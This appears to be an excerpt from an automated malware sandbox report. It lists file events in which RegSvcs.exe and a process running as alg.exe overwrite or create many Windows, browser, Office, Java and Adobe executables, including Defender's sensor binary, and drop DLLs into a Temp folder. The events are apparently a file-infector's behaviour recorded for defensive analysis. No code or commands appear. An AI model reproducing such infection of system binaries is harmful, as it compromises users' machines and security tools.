              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{9DD40E31-8782-438B-BCFD-713DE1B3090F}\117.0.5938.134_117.0.5938.132_chrome_updater.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\msvcp140.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\ucrtbase.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
